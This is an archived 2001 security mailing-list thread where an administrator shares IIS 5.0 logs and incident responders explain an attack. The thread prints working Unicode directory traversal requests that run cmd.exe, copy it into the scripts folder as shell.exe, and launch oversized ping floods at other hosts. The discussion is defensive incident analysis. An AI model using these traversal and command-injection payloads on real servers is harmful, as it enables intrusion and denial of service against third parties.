I've found that if the '-n' argument is set extremely high in the ping command W3SVC adds a line to Event Viewer stating that the script had timed out. For example, the following request: /scripts/..%5c..%5cwinnt/system32/cmd.exe?+/c+ping+-n+120000+-l+65411+-w+130+-v+107+123.123.123.123 would generate an event such as the this: The script started from the URL '/scripts/..%5c..%5cwinnt/system32/cmd.exe' with parameters '/c+ping+-n+120000+-l+65411+-w+130+-v+107+123.123.123.123' has not responded within the configured timeout period. The HTTP server is terminating the script. Blake ================================================================= The Government, like diapers, should be replaced regularly, and often for the same reasons. On Tue, 10 Jul 2001, Jordan K Wiens wrote: > No, a 502 error is a bad gateway error; what happens is that your iis > server is unpatched against the unicde exploits (one of them, at least) and > is executing the command to ping a host. Just recently there seems to be > an increase in the number of hackers using vulnerable web servers for ddos > like behavior using over-sized pings. > > When the ping command executes, it runs the pings, however, it (obviously) > does not return complete html headers as its output (since ping was never > meant to run via the web, its not supposed to run like a normal web > executable). IIS notices this, and realizes that the script hasn't > correctly executed, and lets you know with the 502 error. If you actually > look at the page, the results would read something like: "502 error; the > application has not returned correct headers. The headers it did return > are:" and then IIS would procede to show the output of whatever had been > shown. > > The error you want to see once a machine has been fully patched is usually > a 404 error. > > -- > Jordan Wiens > UF Network Incident Response Team > (352)392-2061 > > On Tue, 10 Jul 2001 myrddin_eat_private wrote: > > > Would like someone to help me understand what is going on here... The 502 > > error at the end end of these entries would indcicate failures, wouldn't > > they? I've been all through the logs on this box, and even thought at every > > attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe > > shows a 502, it is there. > > > > I'm looking at the times on the log entries and guessing that this was a > > manual attack. > > > > Also, can someone please explain what is being attempted with these pings? > > aaa.aaa.aaa.aaa > > bbb.bbb.bbb.bbb > > ccc.ccc.ccc.ccc.ccc > > ddd.ddd.ddd.ddd.ddd > > are all unique addresses. > > > > #Software: Microsoft Internet Information Services 5.0 > > #Version: 1.0 > > #Date: 2001-06-19 18:44:15 > > #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs- > > uri-query sc-status cs(User-Agent) > > 2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe > > /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 - > > 2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe > > /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 - > > 2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe > > /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd > > 502 - > > Free, encrypted, secure Web-based email at www.hushmail.com > > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Jul 11 2001 - 13:26:55 PDT